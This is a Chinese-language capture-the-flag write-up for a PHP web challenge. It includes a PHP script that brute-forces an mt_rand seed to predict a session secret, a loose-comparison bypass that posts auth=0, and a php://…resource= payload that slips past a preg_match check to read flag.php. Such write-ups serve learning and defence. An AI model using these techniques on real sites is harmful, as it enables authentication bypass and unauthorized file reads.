phpjiami/mt_rand/ 弱类型/preg_match

题目地址:http://a3ff80f015a34b59b1b70ab78271dcbbdad8b6e64cce4591.game.ichunqiu.com/
题目界面：

题目打开只有一个key，刷新一次，改变一次，抓包也看不出什么名堂。扫描一波备份/文件泄露，发现存在文件：

• robots.txt
• index.php
• file.php
• flag.php
• admin.php

访问robots.txt可以得到一个code.zip压缩包，里面的经过了phpjiami加密。
解密： phith0n大佬做的一个phpjiami解密的docker镜像：https://hub.docker.com/r/vulhub/php-decrypt-eval/

解密之后得到源码：
index.php代码：

<?php
$seed = rand(0,99999);
mt_srand($seed);
session_start();
function auth_code($length = 12, $special = true)
{
    $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    if ($special) {
        $chars .= '!@#$%^&*()';
    }
    $password = '';
    for ($i = 0; $i < $length; $i++) {
        $password .= substr($chars, mt_rand(0, strlen($chars) - 1), 1);
    }
    return $password;
}
$key = auth_code(16, false);
echo "The key is :" . $key . "<br>";
$private = auth_code(10, false);
if(isset($_POST['private'])){
    if($_POST['private'] === $_SESSION["pri"]){
        header("Location:admin.php");
    }else{
        $_SESSION["pri"] = $private;
        die("No private!");
    }
}    
?>

这里的考点是：mt_rand()产生随机数时,使用同一个种子,可以预测多次产生的随机数值。
代码流程：
首先产生一个16位的随机数，再产生一个10位的随机数并写入到session，然后需要post一个相等的10位随机数就可以进入下一层，即admin.php
所以解决办法就是先爆破通过16位的随机数爆破出种子，再通过种子生成一个10位的随机数，post进去即可。
爆破脚本如下：

<?php 
function auth_code($length = 12, $special = true)
{
    $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    if ($special) {
        $chars .= '!@#$%^&*()';
    }
    $password = '';
    for ($i = 0; $i < $length; $i++) {
        $password .= substr($chars, mt_rand(0, strlen($chars) - 1), 1);
    }
    return $password;
}

for ($seed = 0; $seed < 100000; $seed++) { 
    mt_srand($seed);
    $key = auth_code(16, false);
    if($key == 'E5pepPzORiDnyuws')#key值自行修改
    {   
        echo $seed."\n".auth_code(10, false)."\n";
        break;
    }

}
echo "finish!";
?>

这样就跳到admin.php了，并且得到authAdmin参数的值。

admin.php代码：

<?php
if($_GET['authAdmin']!="***********"){
    die("No login!");
}
if(!isset($_POST['auth'])){
    die("No Auth");
}else{
    $auth  = $_POST['auth'];
    $auth_code = "**********";
    if(json_decode($auth) ==  $auth_code){
        ;
    }else{
        header("Location:index.php");
    }
}
?>

这里需要post一个auth参数使得json_decode($auth) == $auth_code即可进入下一层。
这里利用0==”str”的特性，传一个int型的0进去即可，即auth=0.

到了这里输入东西，点击按钮没有反应，查看源代码，发现一段js代码：

<script>
    $("#give").click(function() {
      filename = $("#filename").val();
      $.ajax({
        url:'file.php',
        type:'post',
        data:{'id':filename,'auth':'1234567890x'},
        dataType:'text',
        success:function(result) {
            console.log(result);
        },
        error:function(XMLHttpRequest, textStatus, errorThrown) {
            console.log(XMLHttpRequest);
            console.log(textStatus);
            console.log(errorThrown);
        }
      })
    })
</script>

file.php代码：

<?php
if($_POST["auth"]=="***********"){
    if(isset($_GET["id"]) &&  (strpos($_GET["id"],'jpg') !== false))
    {
        $id = $_GET["id"];
        preg_match("/^php:\/\/.*resource=([^|]*)/i", trim($id), $matches);
        if (isset($matches[1]))
            $id = $matches[1];
        if (file_exists("./" . $id) == false)
            die("file not found");
        $img_data = fopen($id,'rb');
        $data  = fread($img_data,filesize($id));
        echo $data;
    }else{
        echo "file not found";
    }
}
?>

所以这里尝试post一个auth=1234567890x，get一个id到file.php。
这里考察点是一个preg_match函数的使用，查询PHP官方文档，得知$matches[1]是将包含第一个捕获子组匹配到的文本，也就是正则表达式中第一个括号匹配到的文本，也就是这里的([^|]*)匹配到的内容，即匹配除|以外的任意字符串。所以要求id的值以“php://任意内容resource=要读取的文件”的格式传入才满足条件。
这里我们要读取flag.php，所以id传入php://jpgresource=flag.php就可以获取flag。

reference：###

• mt_rand()种子爆破工具
• writeup-1
• writeup-2
• writeup-3